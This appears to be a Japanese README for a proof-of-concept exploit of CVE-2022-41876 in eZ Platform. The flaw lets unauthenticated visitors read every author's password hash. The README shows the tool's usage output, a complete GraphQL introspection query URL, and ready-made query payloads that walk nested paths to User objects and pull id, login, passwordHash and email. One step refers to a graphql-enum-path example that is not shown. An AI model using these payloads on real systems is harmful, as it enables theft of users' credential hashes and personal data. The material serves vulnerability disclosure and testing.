
未認証のユーザーがすべての投稿者のパスワードハッシュにアクセスできる脆弱性がeZ Platformに発生しました。 このPoCは、'User'オブジェクトに到達する可能性のあるすべてのGraphQLパスを列挙し、それらのパスにリクエストを送信してユーザーの機密情報を取得します。
python3 cve-2022-41876.py -h
usage: cve-2022-41876.py [-h] [-t] [-f FILE] url
CVE-2022-41876 POC
positional arguments:
url Target URL (specify the graphql endpoint)
optional arguments:
-h, --help show this help message and exit
-t, --thread Number of threads
-f FILE, --file FILE Local path to introspect file

このツールがCVEを悪用するために実行する手順は次のとおりです。
このCVEを悪用する最初のステップは、introspect.jsonファイルを取得することです。 取得方法の1つは、以下のペイロードでサーバーのgraphqlエンドポイントにクエリを送信することです:
https://<your-url>/graphql?query={__schema{queryType{name}mutationType{name}subscriptionType{name}types{...FullType}directives{name%20description%20locations%20args{...InputValue}}}}fragment%20FullType%20on%20__Type{kind%20name%20description%20fields(includeDeprecated:true){name%20description%20args{...InputValue}type{...TypeRef}isDeprecated%20deprecationReason}inputFields{...InputValue}interfaces{...TypeRef}enumValues(includeDeprecated:true){name%20description%20isDeprecated%20deprecationReason}possibleTypes{...TypeRef}}fragment%20InputValue%20on%20__InputValue{name%20description%20type{...TypeRef}defaultValue}fragment%20TypeRef%20on%20__Type{kind%20name%20ofType{kind%20name%20ofType{kind%20name%20ofType{kind%20name%20ofType{kind%20name%20ofType{kind%20name%20ofType{kind%20name%20ofType{kind%20name}}}}}}}}
次に、サーバーから返されたjsonを使用して、graphql-enum-pathツールで'User'オブジェクトへのすべてのパスを抽出できます。次のようにします:

最後に、すべてのパスが見つかったら、特定のペイロードを次のように作成し、サーバーに送信する必要があります:
https://<your-url>/graphql?query={element1{element2{element3{...{id,name,login,passwordHash,email,enabled,maxLogin}}}}}
ここで、elementsはgraphql-enum-pathの結果の括弧内のテキストに対応します (各パスに対してクエリを実行する必要があることに注意)。
したがって、上記のgraphql-enum-pathの例では、最初のペイロードは次のようになります:
https://<your-url>/graphql?query={_repository{location{contentInfo{contentType{creator{id,name,login,passwordHash,email,enabled,maxLogin}}}}}}
サーバーがこのCVEに対して脆弱な場合、そのクエリに対して、ユーザーのデータを含むjsonファイルで応答します。